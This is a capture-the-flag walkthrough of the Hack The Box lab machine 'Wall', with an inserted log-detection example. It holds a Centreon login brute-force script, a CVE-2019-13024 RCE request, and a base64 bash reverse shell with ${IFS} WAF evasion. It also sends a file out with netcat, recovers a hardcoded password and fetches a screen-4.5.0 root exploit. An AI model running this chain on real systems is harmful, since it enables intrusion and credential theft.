HTB machine: Wall


    This article is for technical exchange, learning and research only. Using the techniques described here for illegal purposes or for causing damage is strictly prohibited; the author of this article bears no responsibility for any resulting consequences.

    The target is a retired machine accessed with a VIP subscription purchased by the author; its IP address is 10.10.10.157.

    This time https://github.com/Tib3rius/AutoRecon is used for an automated, all-round scan.

    Information enumeration and collection
    https://github.com/codingo/Reconnoitre is similar to autorecon
    autorecon 10.10.10.157 -o ./Wall-autorecon
    
    sudo nmap -sT -p- --min-rate 10000 -oA scans/alltcp 10.10.10.157
    or
    
    sudo masscan -p1-65535,U:1-65535 10.10.10.157 --rate=1000 -e tun0 > ports
    ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
    sudo nmap -Pn -sV -sC -p$ports 10.10.10.157
    Port 80 of the IP address shows the default Apache page, so brute-force the directories.
    
    sudo gobuster dir -u http://10.10.10.157 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php

    Visiting the monitoring directory found above returns a 401 authentication challenge. Testing showed that changing the request method to POST bypasses the authentication, and the information returned leads to http://10.10.10.157/centreon, which presents a login page. Centreon is a distributed monitoring system; see: https://www.cnblogs.com/flytor/p/11440809.html

    Changing to the POST request method

    The response is 200 and the message mentions a URL /centreon; replay it with a normal GET request and see.

    A login form appears. A quick web search confirms that centreon is a monitoring system, and that it ships with the default credentials admin/centreon.

    See: https://www.tenable.com/plugins/nessus/80225 . Logging in with this default account failed, though. Looking at the request captured in Burp Suite, centreon uses a centreon_token for authentication, and the token attached to each request is different, so the usual approach cannot brute-force it. It can be brute-forced with Python code, or with Burp Suite's macro feature; here I use Python.

    Password wordlist used for the brute force
    https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-passwords-shortlist.txt

    Python brute-force code

    #!/usr/bin/python3
    import requests
    from bs4 import BeautifulSoup
    
    url = 'http://10.10.10.157/centreon/index.php'
    s = requests.session()
    
    def sendRequests(username, password):
        # each attempt first loads the login page to obtain a fresh centreon_token
        page = s.get(url)
        soup = BeautifulSoup(page.content, 'html.parser')
        token = soup.find('input', attrs = { 'name' : 'centreon_token' })['value']
        data = { 'useralias' : username, 'password' : password, 'submitLogin' : 'Connect', 'centreon_token' : token }
        response = s.post(url, data = data)
    
        if 'incorrect' not in response.text:
            print("Credentials found {}:{}".format(username, password))
    
    with open('top-passwords-shortlist.txt') as wordlist:
        for word in wordlist:
            password = word.rstrip()
            print("[*] Trying {}".format(password))
            sendRequests('admin',password)

    Execution result

    kali@kali:~/Downloads/htb/wall$ python3 centreon.py
    [*] Trying password
    [*] Trying 123456
    [*] Trying 12345678
    [*] Trying abc123
    [*] Trying querty
    [*] Trying monkey
    [*] Trying letmein
    [*] Trying dragon
    [*] Trying 111111
    [*] Trying baseball
    [*] Trying iloveyou
    [*] Trying trustno1
    [*] Trying 1234567
    [*] Trying sunshine
    [*] Trying master
    [*] Trying 123123
    [*] Trying welcome
    [*] Trying shadow
    [*] Trying ashley
    [*] Trying footbal
    [*] Trying jesus
    [*] Trying michael
    [*] Trying ninja
    [*] Trying mustang
    [*] Trying password1
    Credentials found admin:password1
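    The two web-side behaviours above (a 401 that a POST bypasses, and token-aware password guessing against the centreon login) are exactly what a defender would want to pick out of the Apache access log. The following is an added example, not code from the original write-up: a small Python parser over constructed Apache combined-format log lines that flags both patterns. The log lines, the client IPs and the thresholds are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-format access log lines (not from the target machine): the
# GET->401 / POST->200 pair on /monitoring/, and a burst of POSTs to the centreon login page.
SAMPLE_LOG = [
    '10.10.14.16 - - [30/May/2021:10:00:01 +0000] "GET /monitoring/ HTTP/1.1" 401 459 "-" "curl/7.74"',
    '10.10.14.16 - - [30/May/2021:10:00:03 +0000] "POST /monitoring/ HTTP/1.1" 200 612 "-" "curl/7.74"',
    '10.10.14.99 - - [30/May/2021:10:00:05 +0000] "GET /centreon/index.php HTTP/1.1" 200 3100 "-" "Mozilla/5.0"',
] + [
    '10.10.14.16 - - [30/May/2021:10:01:%02d +0000] "POST /centreon/index.php HTTP/1.1" 200 1200 "-" "python-requests/2.25"' % sec
    for sec in range(0, 48, 2)  # 24 login attempts within 46 seconds
]
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def parse(lines):
    """Yield one dict per line matching the combined log format; other lines are skipped."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield {'ip': m['ip'], 'method': m['method'], 'path': m['path'], 'status': int(m['status']),
                   'ts': datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')}

def method_bypass(events):
    """(ip, path) pairs where GET got a 401 but another method on the same path got 200."""
    combos = defaultdict(set)
    for e in events:
        combos[(e['ip'], e['path'])].add((e['method'], e['status']))
    return sorted(k for k, c in combos.items()
                  if ('GET', 401) in c and any(m != 'GET' and s == 200 for m, s in c))

def login_burst(events, path='/centreon/index.php', threshold=10, window_s=60):
    """Client IPs with >= `threshold` POSTs to the login page inside `window_s` seconds (the rate is the signal, not the status)."""
    per_ip = defaultdict(list)
    for e in events:
        if e['method'] == 'POST' and e['path'] == path:
            per_ip[e['ip']].append(e['ts'])
    flagged = []
    for ip, ts in per_ip.items():
        ts.sort()
        if any((ts[i + threshold - 1] - ts[i]).total_seconds() <= window_s
               for i in range(len(ts) - threshold + 1)):
            flagged.append(ip)
    return sorted(flagged)

if __name__ == '__main__':
    events = list(parse(SAMPLE_LOG))
    print('method-bypass candidates:', method_bypass(events))
    print('login-burst clients:', login_burst(events))
```

    The status code is deliberately not used for the login check: the guessing script above decides success from the body text, so failed attempts do not stand out by status, only by rate.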

    According to the blog post, executing commands requires a POST request to the URI below, with the body parameters shown.
    Request URI
    /centreon/include/configuration/configGenerate/xml/generateFiles.php

    Blog post: https://shells.systems/centreon-v19-04-remote-code-execution-cve-2019-13024/

    Full request

    POST http://10.10.10.157/centreon/include/configuration/configGenerate/xml/generateFiles.php HTTP/1.1
    Host: 10.10.10.157
    Content-Length: 33
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://10.10.10.157
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.864.37
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://10.10.10.157/centreon/main.get.php?p=60901&o=c&server_id=1
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
    Cookie: PHPSESSID=16f08s82qv7rui4vjdm8hbr6jc
    Connection: close
    
    debug=true&generate=true&poller=1

    The response shows the id command executed successfully. Next, set up a reverse shell via base64. Testing revealed a WAF, which is bypassed with ${IFS}.

    echo 'bash -i >& /dev/tcp/10.10.14.16/8833 0>&1' | base64
    YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNi84ODMzIDA+JjEK

    Configure the reverse-shell command in centreon

    echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNi84ODMzIDA+JjEK|base64${IFS}-d|bash;

    Then replay the request above in Burp Suite to trigger the reverse shell.

    Information gathering on the target reveals a backup file named backup.

    Transfer this backup file to the local Kali machine.

    kali: nc -lvnp 9933 > backup.tgz
    target: nc 10.10.14.16 9933 < /opt/.shelby/backup
    The backup file from the target is Python bytecode, which can be decompiled with uncompyle6.
    Install
    sudo pip3 install uncompyle6
    Decompile
    uncompyle6 backup.pyc

    kali@kali:~/Downloads/htb/wall$ uncompyle6 backup.pyc
    # uncompyle6 version 3.7.4
    # Python bytecode 2.7 (62211)
    # Decompiled from: Python 3.8.5 (default, Aug  2 2020, 15:09:07)
    # [GCC 10.2.0]
    # Embedded file name: backup.py
    # Compiled at: 2019-07-30 22:38:22
    import paramiko
    username = 'shelby'
    host = 'wall.htb'
    port = 22
    transport = paramiko.Transport((host, port))
    password = ''
    password += chr(ord('S'))
    password += chr(ord('h'))
    password += chr(ord('e'))
    password += chr(ord('l'))
    password += chr(ord('b'))
    password += chr(ord('y'))
    password += chr(ord('P'))
    password += chr(ord('a'))
    password += chr(ord('s'))
    password += chr(ord('s'))
    password += chr(ord('w'))
    password += chr(ord('@'))
    password += chr(ord('r'))
    password += chr(ord('d'))
    password += chr(ord('I'))
    password += chr(ord('s'))
    password += chr(ord('S'))
    password += chr(ord('t'))
    password += chr(ord('r'))
    password += chr(ord('o'))
    password += chr(ord('n'))
    password += chr(ord('g'))
    password += chr(ord('!'))
    transport.connect(username=username, password=password)
    sftp_client = paramiko.SFTPClient.from_transport(transport)
    sftp_client.put('/var/www/html.zip', 'html.zip')
    print '[+] Done !'
    # okay decompiling backup.pyc

    Based on the decompiled code above, extract the password directly in an interactive Python session.

    kali@kali:~/Downloads/htb/wall$ python
    Python 2.7.18 (default, Apr 20 2020, 20:30:41)
    [GCC 9.3.0] on linux2
    Type "help", "copyright", "credits" or "license" for more information.
    >>> password = ''
    >>> password += chr(ord('S'))
    >>> password += chr(ord('h'))
    >>> password += chr(ord('e'))
    >>> password += chr(ord('l'))
    >>> password += chr(ord('b'))
    >>> password += chr(ord('y'))
    >>> password += chr(ord('P'))
    >>> password += chr(ord('a'))
    >>> password += chr(ord('s'))
    >>> password += chr(ord('s'))
    >>> password += chr(ord('w'))
    >>> password += chr(ord('@'))
    >>> password += chr(ord('r'))
    >>> password += chr(ord('d'))
    >>> password += chr(ord('I'))
    >>> password += chr(ord('s'))
    >>> password += chr(ord('S'))
    >>> password += chr(ord('t'))
    >>> password += chr(ord('r'))
    >>> password += chr(ord('o'))
    >>> password += chr(ord('n'))
    >>> password += chr(ord('g'))
    >>> password += chr(ord('!'))
    >>> password
    'ShelbyPassw@rdIsStrong!'
    >>>

    Use this password, ShelbyPassw@rdIsStrong!, to ssh straight into the target.
    
    sshpass -p 'ShelbyPassw@rdIsStrong!' ssh -oStrictHostKeyChecking=no shelby@10.10.10.157

    After logging in to the target, look for binaries with the 4000 (SUID) permission bit.

    shelby@Wall:~$ find / -perm -4000 2>/dev/null
    /bin/mount
    /bin/ping
    /bin/screen-4.5.0
    /bin/fusermount
    /bin/su
    /bin/umount
    /usr/bin/chsh
    /usr/bin/passwd
    /usr/bin/gpasswd
    /usr/bin/traceroute6.iputils
    /usr/bin/chfn
    /usr/bin/newgrp
    /usr/bin/sudo
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/openssh/ssh-keysign
    /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
    /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
    /usr/lib/eject/dmcrypt-get-device
    shelby@Wall:~$

    This is the classic screen-4.5.0 vulnerability, which gives root directly.
    https://www.exploit-db.com/exploits/41154

    Download it, transfer it to the target and escalate to root.

    wget https://www.exploit-db.com/raw/41154
    dos2unix 41154
    cp 41154 screenpwn.sh
    scp screenpwn.sh shelby@10.10.10.157:/tmp/
    chmod +x screenpwn.sh
    ./screenpwn.sh

    A life in confusion needs constant effort before the blurred ambition in the distance comes into view!
Original article: https://www.cnblogs.com/autopwn/p/14831753.html